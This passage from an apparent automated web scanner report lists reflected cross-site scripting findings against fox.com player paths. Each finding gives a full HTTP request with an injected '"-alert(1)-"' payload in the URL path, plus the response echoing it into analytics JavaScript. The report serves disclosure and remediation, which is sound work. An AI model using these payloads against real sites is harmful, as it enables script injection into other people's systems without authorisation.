X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 22089
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfc78ff"-alert(1)-"da482a500b0"
s_analytics.prop15="sub section:foxurlsigningplugin" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_ana
...[SNIP]...

2.204. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb284"-alert(1)-"57851b34756 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_uifb284"-alert(1)-"57851b34756/fox_player/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22181
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:01 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_uifb284"-alert(1)-"57851b34756:fox_playerggtp370"
s_analytics.hier1="fox:shows:_uifb284"-alert(1)-"57851b34756:fox_playerggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_uifb284"-alert(1)-"57851b347
...[SNIP]...

2.205. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ce4b"-alert(1)-"de8cf054805 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player6ce4b"-alert(1)-"de8cf054805/swf/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.119
Content-Type: text/html; charset=utf-8
Content-Length: 22153
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player6ce4b"-alert(1)-"de8cf054805ggtp370"
s_analytics.hier1="fox:shows:_ui:fox_player6ce4b"-alert(1)-"de8cf054805ggtp370" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player6ce4b"-alert(1)-"de8cf0548
...[SNIP]...

2.206. http://www.fox.com/_ui/fox_player/swf/ggtp370.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/ggtp370.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2144a"-alert(1)-"3077cfb82ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swf2144a"-alert(1)-"3077cfb82ce/ggtp370.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.116
Content-Type: text/html; charset=utf-8
Content-Length: 22041
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:10 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswf2144a"-alert(1)-"3077cfb82ce"
s_analytics.prop15="sub section:ggtp370" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQu
...[SNIP]...

2.207. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17c82"-alert(1)-"2f0bc416e19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui17c82"-alert(1)-"2f0bc416e19/fox_player/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22205
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:47 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui17c82"-alert(1)-"2f0bc416e19:fox_playeromnituremedia"
s_analytics.hier1="fox:shows:_ui17c82"-alert(1)-"2f0bc416e19:fox_playeromnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui17c82"-alert(1
...[SNIP]...

2.208. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18940"-alert(1)-"54fe87175c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player18940"-alert(1)-"54fe87175c4/swf/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22177
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player18940"-alert(1)-"54fe87175c4omnituremedia"
s_analytics.hier1="fox:shows:_ui:fox_player18940"-alert(1)-"54fe87175c4omnituremedia" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player18940"-alert(1
...[SNIP]...

2.209. http://www.fox.com/_ui/fox_player/swf/omnitureMedia.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/omnitureMedia.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1e8b"-alert(1)-"22097ce8d71 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfc1e8b"-alert(1)-"22097ce8d71/omnitureMedia.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.118
Content-Type: text/html; charset=utf-8
Content-Length: 22065
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:55 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfc1e8b"-alert(1)-"22097ce8d71"
s_analytics.prop15="sub section:omnituremedia" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics
...[SNIP]...

2.210. http://www.fox.com/_ui/fox_player/swf/skinFox.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/skinFox.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75260"-alert(1)-"dae9b21bf6a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui75260"-alert(1)-"dae9b21bf6a/fox_player/swf/skinFox.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.104
Content-Type: text/html; charset=utf-8
Content-Length: 22181
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui75260"-alert(1)-"dae9b21bf6a:fox_playerskinfox"
s_analytics.hier1="fox:shows:_ui75260"-alert(1)-"dae9b21bf6a:fox_playerskinfox" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui75260"-alert(1)-"dae9b21bf
...[SNIP]...

2.211. http://www.fox.com/_ui/fox_player/swf/skinFox.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/skinFox.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7088"-alert(1)-"0abab8d3844 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_playera7088"-alert(1)-"0abab8d3844/swf/skinFox.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.111
Content-Type: text/html; charset=utf-8
Content-Length: 22153
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:43 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_playera7088"-alert(1)-"0abab8d3844skinfox"
s_analytics.hier1="fox:shows:_ui:fox_playera7088"-alert(1)-"0abab8d3844skinfox" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_playera7088"-alert(1)-"0abab8d38
...[SNIP]...

2.212. http://www.fox.com/_ui/fox_player/swf/skinFox.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/swf/skinFox.swf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed381"-alert(1)-"bda88077d1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player/swfed381"-alert(1)-"bda88077d1e/skinFox.swf HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.113
Content-Type: text/html; charset=utf-8
Content-Length: 22041
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 22:59:46 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
6="fox:shows" //Site Section
s_analytics.prop7="fox:shows:_ui" //Site Sub - Section
s_analytics.prop8="fox:shows:_ui:fox_playe" //Site Sub-Section 2
s_analytics.prop9="fox:shows:_ui:fox_playerswfed381"-alert(1)-"bda88077d1e"
s_analytics.prop15="sub section:skinfox" //Content Type
s_analytics.prop17="" //Campaign
s_analytics.prop35="" //Content Title
s_analytics.prop36=""
s_analytics.prop42 = (s_analytics.getQu
...[SNIP]...

2.213. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d101"-alert(1)-"de22bde193b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui6d101"-alert(1)-"de22bde193b/fox_player/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.120
Content-Type: text/html; charset=utf-8
Content-Length: 22194
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui6d101"-alert(1)-"de22bde193b:fox_playervideoxml"
s_analytics.hier1="fox:shows:_ui6d101"-alert(1)-"de22bde193b:fox_playervideoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui6d101"-alert(1)-"de22bde
...[SNIP]...

2.214. http://www.fox.com/_ui/fox_player/videoXml.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player/videoXml.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66704"-alert(1)-"19baaf36eac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_ui/fox_player66704"-alert(1)-"19baaf36eac/videoXml.php HTTP/1.1
Host: www.fox.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_vnum%3D1320123600936%2526vn%253D1%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317597917936%3B%20s_dayslastvisit%3D1317596117958%7C1412204117958%3B%20s_dayslastvisit_s%3DFirst%2520Visit%7C1317597917958%3B; s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D34%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.105
Content-Type: text/html; charset=utf-8
Content-Length: 22166
Cache-Control: max-age=3600
Date: Sun, 02 Oct 2011 23:00:09 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:fox_player66704"-alert(1)-"19baaf36eacvideoxml"
s_analytics.hier1="fox:shows:_ui:fox_player66704"-alert(1)-"19baaf36eacvideoxml" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:fox_player66704"-alert(1)-"19baaf3
...[SNIP]...

2.215. http://www.fox.com/_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox.com
Path:   /_ui/fox_player66704%22-alert(1)-%2219baaf36eac/videoXml.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86dee"-alert(1)-"d9f655f316f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

